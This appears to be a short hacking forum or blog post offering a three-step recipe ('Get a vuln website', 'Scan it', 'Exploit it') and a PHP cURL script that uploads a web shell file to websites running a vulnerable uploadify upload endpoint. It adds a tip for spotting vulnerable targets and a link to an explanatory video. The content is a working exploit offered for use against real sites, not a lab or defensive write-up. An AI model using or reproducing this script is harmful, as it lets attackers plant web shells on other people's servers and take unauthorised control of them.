1 step: Get a vuln website!
2 step: Scan it :)
3 step: Exploit it :D
That's the script i use to exploit websites vuln to uploadify
PS: If the page is blank that means the website is vuln!
<?php
$uploadfile="shellname.php";
$ch =
curl_init("http://www.website.com/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Watch the video explaining it: https://www.youtube.com/watch?v=H0jG32CIxtU
Share & like for more :), Thanks!